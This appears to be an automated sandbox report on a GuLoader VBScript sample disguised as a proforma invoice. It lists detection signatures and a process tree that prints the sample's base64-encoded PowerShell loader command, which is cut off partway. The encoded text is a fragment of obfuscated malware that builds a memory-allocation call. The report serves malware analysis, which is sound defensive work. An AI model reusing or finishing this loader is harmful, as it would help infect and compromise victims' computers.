Edit tour
Windows
Analysis Report
Unclear Proforma Invoice.vbs
Overview
General Information
Detection
GuLoader
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Encrypted powershell cmdline option found
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Classification
- System is w10x64
- wscript.exe (PID: 5188 cmdline:
C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\Uncle ar Proform a Invoice. vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 5748 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "IwBO AGUAbABzAC AAUABhAHIA YQBwAHMAeQ BrACAAQQBu AHQAaQBoAC AARAB1AGQA ZQBsAHMAYQ BjACAAZABl AHMAdQBsAC AATQB1AHIA cABoAGkAZQ BkACAATQBs AGQAcgAgAE wAbwB1AHQA aABlACAAQQ BjAGMAdQBt AGIAZQBuAH QAawAgAFAA ZQBjAHQAbw ByAGEAbABp AHMAIABEAH UAdgBlAHQA IABPAHAAcw BwAHIAdABu ACAAbgBlAG QAZABpAGUA cwAgAFUAZA BzAHYAaQBu AGcAIABBAG 4AYQBsAHkA cwBlAGEAIA BGAGEAcgBl AHMAZwBsAG 8AIABEAGUA bQBhAHIAIA BCAGwAdQBl AGIAZQBsAC AAQwBvAHUA cgBpAGQAYQ BoACAAbwBm AGYAbABpAG MAIAANAAoA IwBSAHUAbA BsAGUAcwB0 ACAATABhAG MAaAByAHkA bQBhAHQAIA BCAGEAcgB5 AHQAaAB5AG 0AIABNAGEA cgBpAHMAIA B0AG8AbABz AGUAeQBrAH UAbAAgAFUA dQBkAHMAbA B1AGsAawBl ACAAUwBhAH QAcwBiAGkA bABsAGUAIA BBAGwAdgBp AGQAZQBuAG QAIABVAGQA ZwBhAG4AZw BzAGYAbwBy ACAAVgBlAG QAZwBhACAA RgBlAHIAaQ BlAGwAdQBr AG4AIABSAG UAeQBrACAA QwBoAGEAcw BzAGUAcgAg AEUAcQB1AG EAbABsAGkA IABGAG8Acg BzAHQAZQBu ACAAbQB1AH MAawBpACAA VQBuAHAAZQ BlAGwAIABT AHAAZQBrAH QAYQAgAEoA dQBuAGcAbQ BhAG4AZAB1 AG4AIABpAG 4AZAB1AGsA dAAgAEkAcw BvAGwAIABT AGsAZQBsAG 4AZQBtAHIA awAgAEQAZw BuAGYAbAAg AEYAbwBsAG sAZQByAGUA IABBAGYAcA BhAHMAbgAg AEQAYQBsAG wAeQAgAEwA YQBuAGQAZw BhAG4AZwBz ACAASABlAG 4AcgBpAGsA cwBlAG4AIA BNAG8AbABi AG8AaABpAH MAIABTAGEA bgBlAHIAaQ BuAGcAIABH AHIAdQB0AG 4AIABTAHQA YQBrAGwAYQ BkAGUAcgBu ACAAQQByAG MAaAAgAA0A CgAkAEMAMw AyACAAPQAg AFsAYwBoAG EAcgBdADMA NAAgACsAIA AiAFoAIgAg ACsAIAAiAH cAQQAiACsA IgBsAGwAIg ArACIAbwBj ACIAKwAiAG EAdABlAFYA aQByACIAKw AiAHQAdQBh AGwATQAiAC sAIgBlACIA KwAiAG0AIg ArACIAbwBy AHkAIgAgAC sAIABbAGMA aABhAHIAXQ AzADQADQAK ACMAQwBvAG 0AbQBhAG4A ZABpAG4AZw AgAHUAbgBk AGUAcgBiAG UAIABBAHAA bwByAHIAIA BVAG4AZgB1 AHQAaQBsAC AASgB1AGwA aQBhAG4AaQ BzAHQAYgAg AEIAYQBnAG sAbABkAG4A aQBuAGcAIA BTAGUAcgBl AG4AIABDAG 8AbgB2ACAA TwBzAHQAZQ BvAHAAbABh ACAAVQBuAH AAcgBlAGYA ZQByAGEAIA BTAGEAbQBt AGUAIABTAG UAbQBpAHMA cABpAHIAYQ AgAFIAZQBn AGUAbgBzAG kAYQBuAGUA IABGAGUAaA BzAG8AIABT AGsAbwB2AC AASwBvAG0A cABsAGUAdA B0AGUAIABS AGUAZABzAG UAIABEAGkA cwBwAHUAdA BkAGEAZwAg AEYAYQB1AG MAIABTAGUA bQBpACAAZw BhAGwAYQBj AHQAIABOAG 8AcgBvAHAA aQBhAG4AaQ BjACAATQBp AGwAbABpAH MAZQBrAHUA bgAgAEIAZQ BnAHIAZQBi AHMAZAAgAE sAZABmAGEA cgAgAE0AaQ BzAG8AZwB5 ACAAVABvAH AAZgBvAHIA cwBwACAAQw BwAHIAZgAg AGwAaQB2AH MAYgBlAHQA aQAgAE8Acg BkAHIAZQAg AE0AbABkAG UAaQBuAG8A ZABvACAARQ BrAHMAYQBt AGUAbgAgAF UAZABkAGEA bgBuAGUAbA BzAGUAIAAN AAoAQQBkAG QALQBUAHkA cABlACAALQ BUAHkAcABl AEQAZQBmAG kAbgBpAHQA aQBvAG4AIA BAACIADQAK AHUAcwBpAG 4AZwAgAFMA eQBzAHQAZQ BtADsADQAK AHUAcwBpAG 4AZwAgAFMA eQBzAHQAZQ BtAC4AUgB1 AG4AdABpAG 0AZQAuAEkA bgB0AGUAcg BvAHAAUwBl AHIAdgBpAG MAZQBzADsA DQAKAHAAdQ BiAGwAaQBj ACAAcwB0AG EAdABpAGMA IABjAGwAYQ BzAHMAIABT AGsAeQBkAD EADQAKAHsA DQAKAFsARA